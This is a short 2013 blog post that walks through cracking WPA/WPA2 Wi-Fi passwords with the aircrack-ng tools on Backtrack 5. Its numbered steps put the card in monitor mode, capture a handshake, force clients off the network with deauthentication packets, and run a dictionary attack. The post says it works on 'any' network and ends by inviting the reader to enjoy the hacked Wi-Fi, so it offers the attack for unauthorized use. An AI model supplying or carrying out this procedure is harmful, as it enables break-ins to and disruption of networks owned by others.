Sunday 14 April 2013

How To Hack Wi-Fi Password With Video Tutorial


Author – Leo Harsha

Click Here To Follow






***********************************
How To Hack Wi-Fi WPA/WPA2 Password With Video Tutorial
***********************************
Hello everybody, this is today i'm gonna show you how to hack any wi-fi passwords using backtrack 5

What We Need to hack Wi-fi Password?

1)Backtrack 5 [ R1 or R2]

2)Compatable Wi-fi Card
So Let's Start... 1st open Terminal and Then Follow My Steps :

1)In Terminal type : airmon-ng there we can see interfaces

2)Then type :airmon-ng start wlan0 It must found proceses

3)then we type : airodump-ng mon0 it will start scanning wi-fi networks

4)copy bssid and tpye : airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0

5)type : aireplay-ng -0 5 -a (bssid) mon0

6)click on places home folder drag in terminal wpa-01.cap in terminal and type : aircrack-ng (file Directory) or drag file in
terminal

7)type in terminal : aircrack-ng (filename)*.cap -w (dictionary location) And Hit Enter!

Success!

Watch Video Tutorial Here ==>https://www.youtube.com/watch?v=aLi7V0-YNIo


password now has been hacked.... so you
can enter and enjoy with hacked wi-fi : ))
***********************************


No comments:

Post a Comment